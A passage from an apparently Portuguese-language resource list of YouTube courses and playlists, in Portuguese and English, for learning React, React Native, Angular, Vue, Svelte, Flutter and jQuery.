- [React Course For Beginners - Learn React in 8 Hours](https://www.youtube.com/watch?v=f55qeKGgB_M&ab_channel=PedroTech)
- [Full React Course 2020 - Learn Fundamentals, Hooks, Context API, React Router, Custom Hooks](https://www.youtube.com/watch?v=4UZrsTqkcW4&ab_channel=freeCodeCamp.org)
- [Learn React In 30 Minutes](https://www.youtube.com/watch?v=hQAHSlTtcmY&ab_channel=WebDevSimplified)
- [React JavaScript Framework for Beginners – Project-Based Course](https://www.youtube.com/watch?v=u6gSSpfsoOQ&ab_channel=freeCodeCamp.org)
- [React Crash Course for Beginners 2021 - Learn ReactJS from Scratch in this 100% Free Tutorial!](https://www.youtube.com/watch?v=Dorf8i6lCuk&ab_channel=Academind)
- [React JS Full Course for Beginners | Complete All-in-One Tutorial | 9 Hours](https://www.youtube.com/watch?v=RVFAyFWO4go&ab_channel=DaveGray)
- [Learn React by Building an eCommerce Site - Tutorial](https://www.youtube.com/watch?v=1DklrGoAxDE&ab_channel=freeCodeCamp.org)
- [MERN Stack Full Tutorial & Project | Complete All-in-One Course | 8 Hours](https://www.youtube.com/watch?v=CvCiNeLnZ00&ab_channel=DaveGray)
- [React JS Course for Beginners - 2021 Tutorial](https://www.youtube.com/watch?v=nTeuhbP7wdE&ab_channel=freeCodeCamp.org)
- [React JS - React Tutorial for Beginners](https://www.youtube.com/watch?v=Ke90Tje7VS0&ab_channel=ProgrammingwithMosh)
- [React JS Full Course 2022 | Build an App and Master React in 1 Hour](https://www.youtube.com/watch?v=b9eMGE7QtTk&ab_channel=JavaScriptMastery)
- [React JS Crash Course](https://www.youtube.com/watch?v=w7ejDZ8SWv8&ab_channel=TraversyMedia)
- [React 18 Fundamentals Crash Course 2022](https://www.youtube.com/watch?v=jLS0TkAHvRg&ab_channel=Codevolution)
> Projetos para praticar React em Inglês
- [Modern React Web Development Full Course - 12 Hours | 4 Real Industry Web Applications](https://www.youtube.com/watch?v=XxXyfkrP298&ab_channel=JavaScriptMastery)
- [Full Stack React & Firebase Tutorial - Build a social media app](https://www.youtube.com/watch?v=m_u6P5k0vP0&ab_channel=freeCodeCamp.org)
- [React Project Tutorial: Build a Responsive Portfolio Website w/ Advanced Animations (2022)](https://www.youtube.com/watch?v=hYv6BM2fWd8&t=11s&ab_channel=webdecoded)
- [ReactJS Full Course in 7 Hours | Learn React js | React.js Training | Edureka](https://www.youtube.com/watch?v=VyeA0tVreYw&ab_channel=edureka%21)
- [Code 15 React Projects - Complete Course](https://www.youtube.com/watch?v=a_7Z7C_JCyo&ab_channel=freeCodeCamp.org)
- [Build and Deploy a Fully Responsive Website with Modern UI/UX in React JS with Tailwind](https://www.youtube.com/watch?v=_oO4Qi5aVZs&ab_channel=JavaScriptMastery)
- [Build and Deploy 4 Modern React Apps and Get Hired as a Frontend Developer | Full 10-Hour Course](https://www.youtube.com/watch?v=F627pKNUCVQ&ab_channel=JavaScriptMastery)
- [React JavaScript Framework for Beginners – Project-Based Course](https://www.youtube.com/watch?v=u6gSSpfsoOQ&ab_channel=freeCodeCamp.org)
- [Master React JS by Building Real Projects](https://www.youtube.com/playlist?list=PL6QREj8te1P6wX9m5KnicnDVEucbOPsqR)
- [Playlist for React Projects with 38 videos](https://www.youtube.com/playlist?list=PLillGF-RfqbY3c2r0htQyVbDJJoBFE6Rb)
- [Playlist for React Projects with 36 videos](https://www.youtube.com/playlist?list=PLgMICEduGwEzy6jqbR_yciKiGDsto74Dq)
- [React.js Real-World Projects](https://www.youtube.com/playlist?list=PLj-4DlPRT48nfYgDK00oTjlDF4O0ZZyG8)
- [Playlist for React Projects with 7 vídeos](https://www.youtube.com/playlist?list=PLnHJACx3NwAe5XQDk9xLgym7FF8Q4FYW7)
- [Playlist for React Projects with 24 vídeos](https://www.youtube.com/playlist?list=PLJT9n0q3md18xl4PWqzqNFUEp9DbBmogZ)
- [Playlist for React Projects with 144 vídeos](https://www.youtube.com/playlist?list=PLUOLi8YAwJIKq-FjGssUJQPUNhalEfPhw)
- [Build App Clones with ReactJS](https://www.youtube.com/playlist?list=PL-J2q3Ga50oMQa1JdSJxYoZELwOJAXExP)
- [Real World React Project](https://www.youtube.com/playlist?list=PLOf4R-b03O-BRCXzW0Rw-jVaxZc_6vyK-)
- [Playlist for React Projects with 11 vídeos](https://www.youtube.com/playlist?list=PL_pNGipveQXxpO0_h2sR28OlZvUVgf4oG)
- [50 Days React Bootcamp: Build 50 Real World React Projects](https://www.youtube.com/playlist?list=PLllZK1evlMnbrMyrNQKYp1Gz5m0C3BOHk)
- [Playlist for React Projects with 58 vídeos](https://www.youtube.com/playlist?list=PLZlA0Gpn_vH_NT5zPVp18nGe_W9LqBDQK)
- [ReactJS Projects - Resume / Portfolio Projects](https://www.youtube.com/playlist?list=PLpPqplz6dKxVEqex8RMhgZUUe5_Sc6QHa)
- [React Projects Tutorial](https://www.youtube.com/playlist?list=PLfhDYRr-FofnXgQ3ZDfepp1RsqkoqzByF)
- [React Tutorials - freeCodeCamp](https://www.youtube.com/playlist?list=PLWKjhJtqVAbkArDMazoARtNz1aMwNWmvC)
- [React Projects - Anton Francis Jeejo](https://www.youtube.com/playlist?list=PL5mydh8SndyO_5BML4bVF-8MqsT4UB_1t)
- [React projects for beginners](https://www.youtube.com/playlist?list=PLnkPjO1byC1RFZhsfK8gVXc-h1yAERU1Y)
- [Playlist for React Projects with 29 vídeos](https://www.youtube.com/playlist?list=PLq0uXZmWD-gHwBedf35I7toeJV13q0bG1)
- [Playlist for React Projects with 7 vídeos](https://www.youtube.com/playlist?list=PLaIfT4YsrqUlYkdwsMAcQD0mDMayvB8oX)
- [React JS Project from Scratch: Build a Stock Market Tracker](https://www.youtube.com/playlist?list=PLjItgYqIzJ9VOBgwZ82D9kjQ_QtM5R4u5)
- [Django & React - Full Stack Web App Tutorial](https://www.youtube.com/playlist?list=PLzMcBGfZo4-kCLWnGmK0jUBmGLaJxvi4j)
- [Playlist for React Projects with 7 vídeos](https://www.youtube.com/playlist?list=PLm9bqPO7o3xIkDgiolXDqwnheh9L5gOrw)
- [ReactJS Projects | React Mini Major Projects](https://www.youtube.com/playlist?list=PLuHGmgpyHfRyiYUqrNG4YgWoN8mbHXR3O)
- [Learn React by Building Projects](https://www.youtube.com/playlist?list=PLnWpTZacz3CyT6IWQZKZHVGQmPHo06rk8)
- [React Front-end Projects](https://www.youtube.com/playlist?list=PLgK2z6KmUpgmwHjuDcUobN5Tgrf2Dscga)
- [Playlist for React Projects with 11 vídeos](https://www.youtube.com/playlist?list=PLiYjd-0q4LFuyIgOg1gQkT5NWJ9jgsUoV)
- [Playlist for React Projects with 24 vídeos](https://www.youtube.com/playlist?list=PLMi5Xiz5oefH_j0enBdkKoSMi6XNbhvCt)
- [Complete React | React Playlist with tutorials and interesting](https://www.youtube.com/playlist?list=PLbrmfsRwQoPy2ZXsUbeX9eGsY9C7eiJeo)
- [React Real Time Project](https://www.youtube.com/playlist?list=PLvfbtJ-xXlM7syBwPebciH4KN_R8hRY9v)
- [React Portfolio Website Tutorial From Scratch - Build & Deploy React JS Portfolio Website](https://www.youtube.com/watch?v=G-Cr00UYokU&ab_channel=EGATOR)
- [React Project Tutorial – Build a Portfolio Website w/ Advanced Animations](https://www.youtube.com/watch?v=bmpI252DmiI&ab_channel=freeCodeCamp.org)
- [Strapi Tutorial (with React & GraphQL)](https://www.youtube.com/playlist?list=PL4cUxeGkcC9h6OY8_8Oq6JerWqsKdAPxn)
- [ReactJS Project From Scratch - Blog Project](https://www.youtube.com/playlist?list=PLB_Wd4-5SGAaFKhu_XXQlCpWmP1rjgIz5)
- [Movies App - React Project](https://www.youtube.com/watch?v=sZ0bZGfg_m4&ab_channel=FlorinPop)
- [Job Listing App - ReactJS and TailwindCSS Tutorial](https://www.youtube.com/watch?v=JZQ8m08cbF0&ab_channel=FlorinPop)
## 🐼 Sites e cursos para aprender React Native
> Cursos para aprender React Native em Português
- [Curso de React Native - CFBCursos](https://www.youtube.com/playlist?list=PLx4x_zx8csUgyDN7j9L7gykBjxByM_etD)
- [Curso de React Native - Rocketseat](https://www.youtube.com/playlist?list=PL85ITvJ7FLojBfY7TifCq7P417AZdsP4k)
- [Curso de React Native - Canal Geek Dev](https://www.youtube.com/playlist?list=PL8fIRnD1uUSnRqz3E2caAWDqbtIFXmNtW)
- [Curso de React Native - Webdesign em Foco](https://www.youtube.com/playlist?list=PLbnAsJ6zlidsqILBeTaeUr7aaWcqAtMrW)
- [Curso de React Native - Caio Malheiros](https://www.youtube.com/playlist?list=PL69eBMqNvxhVer10WY3nxgV0qiO8xenOP)
- [Curso de React Native - Sujeito programador](https://www.youtube.com/playlist?list=PLAF5G8rnMmBb2XMMfo79GWnsFvuDuLHA7)
- [Curso de React Native - Developer Plus](https://www.youtube.com/playlist?list=PLxF2lyHGcERApnjQPgeeEIzJJdGurraMW)
- [Curso de React Native - Programador BR](https://www.youtube.com/playlist?list=PLVzrOYTg7zYD__qifpofsQDhHVHEvSx_h)
- [Playlist com vídeos de React Native - Renan H.](https://www.youtube.com/playlist?list=PLB5l-YuqoyEFATE6Ax6WXB0P4AGjRDljr)
- [Curso de React Native - APP IOS e Android](https://www.youtube.com/playlist?list=PLxNM4ef1Bpxhe_PxwprF0R2fp0UurDZuw)
- [Curso de React com MySQL - React Native](https://www.youtube.com/playlist?list=PLxNM4ef1BpxgALv5Vm-ooZo8qYRgCzKSV)
- [Curso de React Native - Eduardo Marques](https://www.youtube.com/playlist?list=PLvVYUfc9tf-JMETwebyYaA4vk3YoXlWAM)
- [Playlist de vídeos sobre React Native](https://www.youtube.com/playlist?list=PLEk7yXd40KELpioDsnXbGu45nhx9xTbiL)
- [Programação para Dispositivos Móveis 2020.1 - React Native](https://www.youtube.com/playlist?list=PLd4Jo6d-yhDIOgnG4EueCh2ADbMCJyJoX)
- [Curso de React Native - Paulo Araujo](https://www.youtube.com/playlist?list=PL9Fgd5f5dgGIjrHsbqQNFUsgo7uQRIAdj)
- [React Native do Zero - Stack Mobile](https://www.youtube.com/playlist?list=PLizN3WA8HR1wRbFttKXDdc_yQ5CWj2msJ)
- [Curso de React Native - Jorge Jardim](https://www.youtube.com/playlist?list=PLvmEIQBREIvS_gS6BX5Tk1z61i85BZF7E)
- [Curso de React Native - Marcelo Anselmo](https://www.youtube.com/playlist?list=PLBWrrrRI1gZBbmG43QE1hYOsqu5QXjilT)
- [Desenvolvimento de App com React Native e NestJS](https://www.youtube.com/playlist?list=PLTLAlheiUm5G6yzSN0KTBbZwZS8xVKYxI)
> Projetos para praticar React Native em Português
- [Netflix Clone - Utilizando React Native](https://www.youtube.com/playlist?list=PL_Axpn7FrXHSt92vK3EthJCId4mUn7viv)
- [Programando um Aplicativo em React Native do Zero](https://www.youtube.com/playlist?list=PL4zG19BCs4pdPJzElbUxCykHTClU-B0Ts)
- [Playlist com projetos em React Native- Arthur Duarte](https://www.youtube.com/playlist?list=PLH7791M3Es82ztdPxpeLZXmfBG4tAJloH)
- [Playlist com projetos em React Native - Hebert Alquimin](https://www.youtube.com/playlist?list=PLg1BUBhZiTHNYFDZUYplk9m0D1hF_tr3j)
> Cursos para aprender React Native em Inglês
- [React Native Tutorial for Beginners - Crash Course 2020](https://www.youtube.com/watch?v=qSRrxpdMpVc&ab_channel=Academind)
- [The Complete React Native Course 2021 : from Zero to Hero](https://www.youtube.com/watch?v=ANdSdIlgsEw&ab_channel=ProgrammingwithMash)
- [React Native Crash Course | Build a Complete App](https://www.youtube.com/watch?v=VozPNrt-LfE&ab_channel=Academind)
- [React Native Crash Course for Beginners - Build 4 Apps in 14 Hours (Redux, Tailwind + More)](https://www.youtube.com/watch?v=AkEnidfZnCU&ab_channel=SonnySangha)
- [React Native Tutorial for Beginners](https://www.youtube.com/playlist?list=PL4cUxeGkcC9ixPU-QkScoRBVxtPPzVjrQ)
- [React Native Fashion](https://www.youtube.com/playlist?list=PLkOyNuxGl9jyhndcnbFcgNM81fZak7Rbw)
- [React Native Tutorial - 2021](https://www.youtube.com/playlist?list=PL8kfZyp--gEXs4YsSLtB3KqDtdOFHMjWZ)
- [Let's Code React Native](https://www.youtube.com/playlist?list=PLcDaXGnNU58bmEbkYNUHsrLMF6a_AqjF9)
- [React Native UI's](https://www.youtube.com/playlist?list=PL6sXCB6Pgqf9RbLaxmiSQQXp-a0_j56xe)
- [React Native EU 2020 - Virtual Edition](https://www.youtube.com/playlist?list=PLZ3MwD-soTTEGG42-BvoqD0qK0vKV2ygm)
- [React Native Tutorial - Styling](https://www.youtube.com/playlist?list=PL0CFwZ06NyfKR1x7aYBXBwplNMwa2CMFX)
- [React Native - Computer Science Tutorial](https://www.youtube.com/playlist?list=PLA_u3gtc5zsyEgLaTLY7clKiM2IRU4ndI)
> Projetos para praticar React Native em Inglês
- [Tutoriais React/React Native](https://www.youtube.com/playlist?list=PLntXnq2Zot_04VH1IFSZwJspOfKquAyKq)
- [React Native Animation Tutorials](https://www.youtube.com/playlist?list=PLYxzS__5yYQmdfEyKDrlG5E0F0u7_iIUo)
- [React Native Music Player](https://www.youtube.com/playlist?list=PLaAoUJDWH9Wqatfwa4SEfyFevrl8QefcN)
- [React Native Tutorials](https://www.youtube.com/playlist?list=PLQWFhX-gwJblNXe9Fj0WomT0aWKqoDQ-h)
- [React Native Crud](https://www.youtube.com/playlist?list=PLLEQmYfSF6FQCrSxRuq-4OCYx8wE67yfV)
- [React Native Tutorial for Beginners - Build a React Native App](https://www.youtube.com/watch?v=0-S5a0eXPoc&ab_channel=ProgrammingwithMosh)
## 🐯 Sites e cursos para aprender Angular
> Cursos para aprender Angular em Português
- [Curso de Angular - Matheus Battisti - Hora de Codar](https://www.youtube.com/playlist?list=PLnDvRpP8Bnex2GQEN0768_AxZg_RaIGmw)
- [Curso de Angular - Loiane Groner](https://www.youtube.com/playlist?list=PLGxZ4Rq3BOBoSRcKWEdQACbUCNWLczg2G)
- [Curso Angular 9 - Cod3r Cursos](https://www.youtube.com/playlist?list=PLdPPE0hUkt0rPyAkdhHIIquKbwrGUkvw3)
- [Curso Angular 9 - Michelli Brito](https://www.youtube.com/playlist?list=PL8iIphQOyG-DSLV6qWs8wh37o0R_F9Q_Q)
- [Curso Começando com Angular](https://www.youtube.com/playlist?list=PLHlHvK2lnJneQPfbOvUait1MtAoXeYhtL)
- [Curso Angular v13 - Tour of Heroes](https://www.youtube.com/playlist?list=PLqsayW8DhUmvtNlkDqYj99X73ts9FLK7j)
- [Curso Angular para Iniciantes](https://www.youtube.com/playlist?list=PLWgD0gfm500Fhx8xSutDtEu8Q2hKTQpB9)
- [Curso de Angular - Rodrigo Branas](https://www.youtube.com/playlist?list=PLQCmSnNFVYnTD5p2fR4EXmtlR6jQJMbPb)
- [Aplicação com Angular 12+: Como desenvolver uma pokedex](https://www.youtube.com/watch?v=UhOcUII_5PU&ab_channel=VidaFullStack)
- [Angular (O Vídeo que Você Precisava para Começar no Framework) - Dicionário do Programador](https://www.youtube.com/watch?v=Yf0rC7dERjg&ab_channel=C%C3%B3digoFonteTV)
> Cursos para aprender Angular em Inglês
- [Angular for Beginners Course - Full Front End Tutorial with TypeScript](https://www.youtube.com/watch?v=3qBXWUpoPHo&ab_channel=freeCodeCamp.org)
- [Complete Angular 13 Course Step by Step](https://www.youtube.com/playlist?list=PL1BztTYDF-QNrtkvjkT6Wjc8es7QB4Gty)
- [Angular - Complete Course Guide](https://www.youtube.com/playlist?list=PL_euSNU_eLbeAJxvVdJn5lhPWX9IWHhxs)
- [Angular Tutorial For Beginners](https://www.youtube.com/playlist?list=PLC3y8-rFHvwhBRAgFinJR8KHIrCdTkZcZ)
- [Angular Crash Course](https://www.youtube.com/watch?v=3dHNOWTI7H8&ab_channel=TraversyMedia)
- [Angular Tutorials](https://www.youtube.com/playlist?list=PLWKjhJtqVAblNvGKk6aQVPAJHxrRXxHTs)
- [Angular Tutorial For Beginners 2022](https://www.youtube.com/playlist?list=PL82C6-O4XrHdf0LMDVl1Y-4_BFbNmdrGc)
- [Complete TypeScript + Angular Tutorial by Sandeep Soni - Angular Full Course](https://www.youtube.com/playlist?list=PLo80fWiInSIOTOeS3TRCk0_pCYVKbWDBG)
- [Angular Tutorial for Beginners: Learn Angular & TypeScript](https://www.youtube.com/watch?v=k5E2AVpwsko&ab_channel=ProgrammingwithMosh)
- [Angular 14 full course 2022 for beginner](https://www.youtube.com/watch?v=IYI0em-xT28&ab_channel=Bitfumes)
- [Angular Tutorial for Beginners - Web Framework with Typescript Course](https://www.youtube.com/watch?v=AAu8bjj6-UI&ab_channel=freeCodeCamp.org)
- [The Ultimate Angular and Nodejs Tutorial For Beginners 2022](https://www.youtube.com/watch?v=NFh9WEH0Zi4&ab_channel=CodeWithNasir)
- [Angular 11 Tutorial - Code a Project from Scratch](https://www.youtube.com/watch?v=LiOzTQAz13Q&ab_channel=freeCodeCamp.org)
- [Cafe Management System - Angular, Node.js, MySQL Database Complete Project step by step](https://www.youtube.com/watch?v=SqSN6sqbdMQ&ab_channel=BTechDays)
- [Spring Boot and Angular Tutorial - Build a Reddit Clone Coding Project](https://www.youtube.com/watch?v=DKlTBBuc32c&ab_channel=freeCodeCamp.org)
- [The Modern Angular Crash Course - 2022](https://www.youtube.com/watch?v=WHv1YQUg6ow&ab_channel=LaithAcademy)
- [Angular Full Course - Learn Angular in 6 Hours | Angular Tutorial For Beginners | Edureka](https://www.youtube.com/watch?v=Ati-oip_HcU&ab_channel=edureka%21)
- [Angular for Beginners - Let's build a Tic-Tac-Toe PWA](https://www.youtube.com/watch?v=G0bBLvWXBvc&ab_channel=Fireship)
- [Learn Angular - Full Tutorial Course](https://www.youtube.com/watch?v=2OHbjep_WjQ&ab_channel=freeCodeCamp.org)
- [AngularJS Tutorial for Beginners Full Cours)](https://www.youtube.com/watch?v=9b9pLgaSQuI&ab_channel=MyLesson)
- [Angular 14 Full Course with real time example 2022 - Angular crud + authentication + Material UI](https://www.youtube.com/watch?v=rZCQiMdQsxE&ab_channel=NihiraTechiees)
- [Spring Boot and Angular Full Stack Development | 4 Hour Course](https://www.youtube.com/watch?v=8ZPsZBcue50&ab_channel=Amigoscode)
- [Angular Full Course - Learn Angular In 3 Hours | Angular Tutorial For Beginners | Simplilearn](https://www.youtube.com/watch?v=iZ1mlcCkY8A&ab_channel=Simplilearn)
- [Angular Crash Course for beginners](https://www.youtube.com/watch?v=T_Fe4IaG0KU&ab_channel=HiteshChoudhary)
- [Full Angular Course](https://www.youtube.com/playlist?list=PLjsBk8SIQEi-RqkglLcn19TaeeopcuDXV)
- [Build a Webshop – Angular, Node.js, TypeScript, Stripe](https://www.youtube.com/watch?v=Kbauf9IgsC4&ab_channel=freeCodeCamp.org)
- [Spring Boot Full Stack with Angular | Full Course 2021 ](https://www.youtube.com/watch?v=Gx4iBLKLVHk&ab_channel=Amigoscode)
## 🐞 Sites e cursos para aprender Vue
> Cursos para aprender Vue em Português
- [Curso de Vue - Matheus Battisti - Hora de Codar](https://www.youtube.com/playlist?list=PLnDvRpP8BnezDglaAvtWgQXzsOmXUuRHL)
- [Curso gratuito Vue.js 3 INTRO](https://www.youtube.com/playlist?list=PLcoYAcR89n-qTYqfWTGxXMnAvCqY3JF8w)
- [Curso Gratuito de Vue 3](https://www.youtube.com/playlist?list=PLVSNL1PHDWvRbZsrcQ249Ae5MoKrlBTdd)
- [Vue.js do jeito ninja](https://www.youtube.com/playlist?list=PLcoYAcR89n-qq1vGRbaUiV6Q9puy0qigW)
- [Vue JS - Curso Completo](https://www.youtube.com/playlist?list=PLWNaqtzH6CWR-dykXeDD5XmMzJur9JBIh)
- [VueJS - Curso de Iniciação](https://www.youtube.com/playlist?list=PLXik_5Br-zO_xQHAH9GrNR1gAefYWaKxz)
- [VueJS em 1 hora! (Teoria e prática)](https://www.youtube.com/watch?v=cSa-SMVMGsE&ab_channel=AyrtonTeshima-ProgramadoraBordo)
- [Curso Vue 3, Quasar e Supabase](https://www.youtube.com/playlist?list=PLBjvYfV_TvwIfgvouZCaLtgjYdrWQL02d)
- [Curso de Vue.js & Vuetify - Lista de tarefas vue-todo](https://www.youtube.com/playlist?list=PLygIEirBzJi6qaDltMN44zyVHjbqUa4e-)
- [Curso de Vuejs 2 - Completo](https://www.youtube.com/playlist?list=PLWhiA_CuQkbDxptXchXrYuGZnhlwnJgOF)
> Cursos para aprender Vue em Inglês
- [Vue.js Course for Beginners - 2021 Tutorial](https://www.youtube.com/watch?v=FXpIoQ_rT_c&ab_channel=freeCodeCamp.org)
- [Vue JS Crash Course](https://www.youtube.com/watch?v=qZXt1Aom3Cs&ab_channel=TraversyMedia)
- [Vue 3 Tutorial - Full Course 10 Hours 10 apps](https://www.youtube.com/watch?v=e-E0UB-YDRk&ab_channel=Bitfumes)
- [The best way to learn Vue.js in 2022 - CRASH COURSE](https://www.youtube.com/watch?v=bzlFvd0b65c&ab_channel=VueMastery)
- [Vue 3 Tutorial for Beginners - FULL COURSE in 3 Hours](https://www.youtube.com/watch?v=ZqgiuPt5QZo&ab_channel=TheEarthIsSquare)
- [VUE JS 3 Complete Course Tutorial](https://www.youtube.com/playlist?list=PL_euSNU_eLbedoBv-RllKj_f2Yh--91nZ)
- [The Ultimate Vue 3 Tutorial (100% Composition API)](https://www.youtube.com/watch?v=I_xLMmNeLDY&ab_channel=LaithAcademy)
- [VUE JS CRUD | VUE JS Contacts Manager | VUE JS Tutorial | 2022](https://www.youtube.com/watch?v=_5Tw_oI9kKg&ab_channel=UiBrainsTechnologies)
- [Vue.js Explained in 100 Seconds](https://www.youtube.com/watch?v=nhBVL41-_Cw&ab_channel=Fireship)
## 🦂 Sites e cursos para aprender Svelte
> Cursos para aprender Svelte em Português
- [Curso Intensivo de Svelte](https://www.cod3r.com.br/courses/svelte-intensivo)
- [Curso Intensivo de Svelte - Aprenda SvelteJS em 1 Vídeo](https://www.youtube.com/watch?v=SVNTizLyuvo&ab_channel=Cod3rCursos)
- [Como trabalhar com Framework Svelte? Com Mario Souto](https://www.youtube.com/watch?v=1F7r0G0hFcE&ab_channel=AluraCursosOnline)
> Cursos para aprender Svelte em Inglês
- [Svelte Tutorial for Beginners](https://www.youtube.com/playlist?list=PL4cUxeGkcC9hlbrVO_2QFVqVPhlZmz7tO)
- [Learn Svelte – Full Course for Beginners](https://www.youtube.com/watch?v=UGBJHYpHPvA&ab_channel=freeCodeCamp.org)
- [Svelte Tutorial for Beginners](https://www.youtube.com/playlist?list=PLC3y8-rFHvwiYZOsc2D8AO1MYwLjZQrKx)
- [SvelteKit Tutorial (Crash Course)](https://www.youtube.com/playlist?list=PL4cUxeGkcC9hpM9ARM59Ve3jqcb54dqiP)
- [Svelte Complete Course | 2022 | Tutorials](https://www.youtube.com/watch?v=cGQo_iNJaQ4&ab_channel=RDHCode)
- [Svelte full course 2022 for beginner](https://www.youtube.com/watch?v=AilOdkZGeOk&ab_channel=Bitfumes)
- [Svelte Complete Tutorials from basics to advance Course](https://www.youtube.com/playlist?list=PLKf7GYNMvJ1NInsRQqGmKL233dlAQtWwO)
- [Learn the Svelte JavaScript Framework - Full Course](https://www.youtube.com/watch?v=ujbE0mzX-CU&ab_channel=freeCodeCamp.org)
- [Svelte Tutorial - Is it better than React?](https://www.youtube.com/watch?v=vhGiGqZ78Rs&ab_channel=freeCodeCamp.org)
- [Brand NEW APP Marathon! LIVE Coding & Chill with SvelteKit](https://www.youtube.com/watch?v=wrADp40o1YY&ab_channel=JohnnyMagrippis)
- [Let's try SvelteKit](https://www.youtube.com/watch?v=60e9Cs9lMhg&ab_channel=SimonGrimm)
- [Sveltejs 3 Basics Complete Crash Course Tutorials](https://www.youtube.com/watch?v=Ub5veQTl-ik&ab_channel=RDHCode)
- [Svelte Crash Course for Beginners](https://www.youtube.com/watch?v=0I_B6o2RX5A&ab_channel=EvanDoesTech)
- [Svelte 3 Reaction & QuickStart Tutorial](https://www.youtube.com/watch?v=043h4ugAj4c&ab_channel=Fireship)
- [Svelte Crash Course](https://www.youtube.com/watch?v=uK2RnIzrQ0M&ab_channel=TraversyMedia)
- [Svelte Course | Learn from scratch](https://www.youtube.com/watch?v=-9V6AsahNFE&ab_channel=AnotherSapiens)
## 🦞 Sites e cursos para aprender Flutter
> Cursos para aprender Flutter em Português
- [Curso COMPLETO de Flutter](https://www.youtube.com/playlist?list=PLlBnICoI-g-d-J57QIz6Tx5xtUDGQdBFB)
- [Flutter Curso 2022](https://www.youtube.com/playlist?list=PLlBnICoI-g-fuy5jZiCufhFip1BlBswI7)
- [Flutter e Dart - Curso](https://www.youtube.com/playlist?list=PLqdwHeoSjEN-9aGd-RxaS_2cyD_AKT0c_)
- [Curso de FLUTTER 2022](https://www.youtube.com/playlist?list=PL5EmR7zuTn_Yu_YV2pT0h0843vRGiTMtx)
- [Curso Flutter](https://www.youtube.com/playlist?list=PLg5-aZqPjMmBmCIgUZ0kNtoE7KJfvJZXS)
- [Curso Flutter Básico [NV1] - 2022](https://www.youtube.com/playlist?list=PLRpTFz5_57cvo0CHf-AnojOvpznz8YO7S)
- [Curso de FLUTTER e DART](https://www.youtube.com/playlist?list=PL5EmR7zuTn_aX0pG4oWTyKKQT25Hkq2XG)
- [A Primeira Aula de Flutter Que Todo Mundo Deveria Ter](https://www.youtube.com/watch?v=J4BVaXkwmM8&ab_channel=FilipeDeschamps)
- [Curso Flutter - Projeto COMPLETO Passo a Passo [Campo Minado]](https://www.youtube.com/watch?v=i3w3Wnouowo&ab_channel=Cod3rCursos)
- [Education App UI Design in Flutter - Flutter UI Design Tutorial](https://www.youtube.com/watch?v=ucwBcTgxyME&ab_channel=DearProgrammer)
- [Live Coding | Desenvolva um aplicativo em Flutter!](https://www.youtube.com/watch?v=j8Swzym_EEc&ab_channel=AluraCursosOnline)
- [Flutter: Configurando cores dinâmicas | #AluraMais](https://www.youtube.com/watch?v=gI4-vj0WpKM&ab_channel=AluraCursosOnline)
- [Curso de Flutter: Criando seu primeiro App grátis](https://www.youtube.com/playlist?list=PLHlHvK2lnJndhgbqLl5DNEvKQg5F4ZenQ)
- [Curso Flutter Avançado - 2022](https://www.youtube.com/playlist?list=PLRpTFz5_57cufduUDgiZZqA_k5Q7UV_50)
- [Curso de Programação com Dart - 2022](https://www.youtube.com/playlist?list=PLRpTFz5_57cseSiszvssXO7HKVzOsrI77)
- [Flutter e MobX: Desenvolva uma Aplicação Completa - Masterclass 2021](https://www.youtube.com/watch?v=LeRjIY4n2Vk&ab_channel=Cod3rCursos)
> Cursos para aprender Flutter em Inglês
- [Flutter Course for Beginners – 37-hour Cross Platform App Development Tutorial](https://www.youtube.com/watch?v=VPvVD8t02U8&ab_channel=freeCodeCamp.org)
- [Free Flutter Course](https://www.youtube.com/playlist?list=PL6yRaaP0WPkVtoeNIGqILtRAgd3h2CNpT)
- [Flutter bootcamp 2022 || Flutter Complete course for beginners to advanced level](https://www.youtube.com/playlist?list=PLFyjjoCMAPtxq8V9fuVmgsYKLNIKqSEV4)
- [Flutter Tutorial for Beginners](https://www.youtube.com/playlist?list=PL4cUxeGkcC9jLYyp2Aoh6hcWuxFDX6PBJ)
- [Flutter Crash Course for Beginners 2021 - Build a Flutter App with Google's Flutter & Dart](https://www.youtube.com/watch?v=x0uinJvhNxI&ab_channel=Academind)
- [Flutter Firebase & DDD](https://www.youtube.com/playlist?list=PLB6lc7nQ1n4iS5p-IezFFgqP6YvAJy84U)
- [Flutter State Management Course](https://www.youtube.com/playlist?list=PL6yRaaP0WPkUf-ff1OX99DVSL1cynLHxO)
- [Flutter and Firebase Course](https://www.youtube.com/playlist?list=PL78sHffDjI77iyUND7TrUOXud9NSf0eCr)
- [Full Stack Flutter Development](https://www.youtube.com/playlist?list=PLFhJomvoCKC-HHwfZzIy2Mv59Uen88rqB)
- [Flutter UI Tutorial - UI Design Best Practices](https://www.youtube.com/playlist?list=PLjOFHn8uDrvQDUiY57tQN39wI_NAey8x1)
- [Flutter Tutorial for Beginners | Flutter App Development Course](https://www.youtube.com/playlist?list=PLS1QulWo1RIa5W8F_XInRJrZLwkLY39oK)
- [Flutter Tutorial For Beginners in 3 Hours](https://www.youtube.com/watch?v=CD1Y2DmL5JM&ab_channel=FlutterMapp)
- [Flutter Tutorial For Beginners In 1 Hour - 2022](https://www.youtube.com/watch?v=C-fKAzdTrLU&ab_channel=FlutterMapp)
- [Flutter Course – Build Full Stack Google Docs Clone](https://www.youtube.com/watch?v=F6P0hve2clE&ab_channel=freeCodeCamp.org)
- [Flutter 3.0 & Rest API crash course, build a store app](https://www.youtube.com/watch?v=YAoYJfitObA&ab_channel=CodingwithHadi)
- [Flutter Essentials - Learn to make apps for Android, iOS, Windows, Mac, Linux (Full Course)](https://www.youtube.com/watch?v=P2IGQT3BZQo&ab_channel=freeCodeCamp.org)
- [Dart Programming Tutorial - Full Course](https://www.youtube.com/watch?v=Ej_Pcr4uC2Q&ab_channel=freeCodeCamp.org)
- [Flutter Mobile App + Node.js Back End Tutorial – Code an Amazon Clone [Full Course]](https://www.youtube.com/watch?v=ylJz7N-dv1E&ab_channel=freeCodeCamp.org)
## 🐹 Sites e cursos para aprender jQuery
> Cursos para aprender jQuery em Português
- [Curso JQUERY BÁSICO](https://www.youtube.com/playlist?list=PLIZ0d6lKIbVpF5DffKAX5e9L119PleIqg)
- [Curso de JQuery (Universidade XTI)](https://www.youtube.com/playlist?list=PLxQNfKs8YwvGOv4evjpsB3JWWZnYChp04)
- [Curso JQuery 2019 - Aprende a usar JQuery do zero](https://www.youtube.com/playlist?list=PLtLYd79f_qX9uufvXcgMrG6XVyc0VHlMp)
- [Curso jQuery - código facilito](https://www.youtube.com/playlist?list=PLTE0X123tz-yxigJHnmuEgqWeVMI7YI-W)
